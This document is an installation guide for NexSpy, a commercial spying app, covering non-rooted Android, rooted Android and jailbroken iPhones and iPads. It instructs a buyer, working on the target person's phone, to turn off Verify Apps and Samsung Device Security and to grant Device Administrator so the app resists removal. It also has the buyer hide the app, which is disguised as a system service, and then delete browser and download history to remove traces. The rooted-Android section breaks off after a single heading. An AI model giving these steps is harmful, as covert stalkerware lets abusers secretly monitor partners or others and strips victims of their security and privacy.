1. Get your license

It is best to use an official email address as it will be used to receive your login credentials after purchase.

Make sure to choose the right license for your need, although it's not that complex.

Using the provided credentials, log in to your portal at https://my.nexspy.com/. There you will have full control over your account, your license details, installation guides, and documentation.

With everything ready, now you can proceed to the next step.

2. Install the software

After getting your license ready, there is a setup process to go through.

If the target phone is right at hand, you may only need several minutes to complete this step including installing the monitoring app and make necessary settings on the target device.

Install Software On Non-Rooted Android

This guide is for installing on non-rooted Android devices only (phones and tablets).

► Some advanced features such as IM capture require a rooted device to work. Please see the guide for installing on a rooted device if you want those features.

► Before proceeding, check that you have a compatible OS version.

► You can find your OS version from the device's Settings > About > Android Version page.

► Be sure you have any passwords necessary to access the device after a restart.

► Minor steps below may differ between Android OS versions, device models and browser being used.

The installation process need to be carried out directly on the target device (the phone or tablet that you want to spy on), not from your own device.

Prerequisites

1. Disable Security Settings

From the Apps drawer, tap on Google Settings > Security. Under Verify Apps, turn off all options.

2. Enable Unknown Sources

Go to Apps > Settings > Lock Screen & Security and make sure Unknown Sources is enabled.

3. Disable Device Security (Samsung only)

Go to Settings -> Apps, tap three dot icon on the top right, then tap Show system apps -> Device security -> Storage -> Clear data -> Delete

Installation Process

1. Download the Application

Open up your phone internet browser and navigate to the website ​https://dmw.bz/. At the Private Software Repository screen, add a check in the box for I am a customer and I have a license code, then tap View all software. Tap on the Android icon to start the download. Once the download has completed tap the file to begin installation.

2. Software Installation

Tap Next, then tap Install. Once installation has completed, tap Open when the option appears.

☆ Important Note
If you cannot tap Open and can only tap Done, this indicates the software is already installed. If you are reinstalling the software, you must first uninstall the previous version.

To uninstall the previous version, go to Settings > Application Manager > com.android.system.service and tap Uninstall. We recommend restarting the phone after uninstalling. You may then start a new installation.

3. SIM Card Support

If a SIM card is not already inserted, Phones running Android OS 4.x may see a message to Insert Sim Card. For dual SIM phone models, only a single SIM card can be fully supported. If you see this screen please turn the phone off to insert a SIM card, and then restart from the beginning.

4. Activate Device Administrator

For non-rooted Android devices that cannot have root permissions granted to the application, activate Device Administrator for the application. This grants the software additional local permissions making it more secure and less likely to be uninstalled. Tap Activate to continue.

5. Activation Code & Visibility

Enter your license code and tap Activate. Please wait as the software activates. You will then be asked to set your software visibile or invisible. Tap Yes to hide the software icon, or tab No to keep it visible in the App Drawer.

Congratulations! You have now completed the software installation, however to remove traces of the installation, please follow the steps below.

6. Clear Browser

In the phone browser you used in Step 1, you can delete the browser URL history. Tap the browser menu button and then tap Settings > Privacy > Delete Personal Data. Make sure the options for Browser History, Cache, and Cookies and Site Data are selected, then tap Delete.

☆ Important Note
Steps may vary depending on the browser being used.

7. Clear Download History

To delete the downloaded file, press the Home button to return to the app list, and choose the My Files browser. Tap Download History. Select the downloaded file, then tap the Trash icon to delete the installation file from the phone. Tap Delete to confirm.

8. Enable Large keyboard text (or Magnify keyboard text on some device)

Go to Settings -> Advanced settings -> Accessibility, scroll down to Services and make sure Large keyboard text (or Magnify keyboard text) is enable.

Install Software On Rooted Android

This guide is for installing on rooted Android devices only (phones and tablets).

► If your Android is not rooted, please see the guide for installing onto a non-rooted device.

► Before proceeding, check that you have a compatible OS version.

► You can find your OS version from the device's Settings > About > Android Version page.

► Be sure you have any passwords necessary to access the device after a restart.

► Minor steps below may differ between Android OS versions, device models and browser being used.

If you use Magisk for rooting, tap Settings icon on the device, go to Apps & Notifications -> Magisk Manager and toggle the top option to OFF.

Installation Process

1. Download the Application

Install Software On iOS (iPhone/iPad)

This guide is for installing on jailbroken iOS devices only (iPhone and iPad).

► Minor steps may differ between iPhone and iPad installation, also between different versions of iOS and/or Cydia.

► Before proceeding, check that you have a compatible iOS version.

► Jailbreaking is a pre-requisite for all iOS installations. Please ensure your iOS device is already jailbroken before proceeding with this installation guide.

► You'll also need an Internet connection from the device, and any passwords necessary when restarting it.

☆ Important Note

The installation process need to be carried out directly on the target device (the phone or tablet that you want to spy on), not from your own device.

1. On a jailbroken device, tap the CYDIA icon.

2. Inside Cydia, tap SOURCES.

3. Tap EDIT.

4. Tap ADD.

5. In the dialog box that appears, type in http://ios.dmw.cc and tap ADD SOURCE.


6. Tap RETURN TO CYDIA.

7. Tap the new ios.dmw.cc source that is listed.

8. Tap UTILITIES.

9. Tap SYSTEM CORE.

10. Tap INSTALL.

11. Tap CONFIRM.

12. Tap RESTART SPRINGBOARD.

13. After restarting, the device should display the Activation screen below.

In some cases the Activation screen may not appear. If so, look for the Phone Monitor icon and tap to run it. If the Phone Monitor icon is hidden, you can also dial *# and your license code (example: *#123456789) to bring up the Activation screen.

When the screen below appears, type in your license key and tap OK.

For iPad users, load the Notes app and enter *#license-code (*#123456789) instead of the dialer.

14. Type in your license key and tap OK when activation has been completed.

15. Tap YES to keep the icon visible, or tap NO to hide it.

16. When the screen below appears, tap CONFIGURE.

17. Set the icon visibility as explained below.

a. Tap Phone Monitor to hide the software icon. It will turn from green to gray and will then be hidden.

b. Tap Cydia to hide the Cydia icon. It will turn from green to gray and will then be hidden.

c. Tap Jailbreak to hide the jailbreak icon. It will turn from green to gray and will then be hidden.

18. Press the Home Button on the iPhone itself to exit the software setup.

Congratulations! You have installed and activated Software successfully!

3. View your monitored data

Once the installation on the target phone completed, you may start viewing all monitored data from the target phone immediately.

To do that, all you need to do is logging into your portal. You can always access it online by visiting https://my.nexspy.com/.
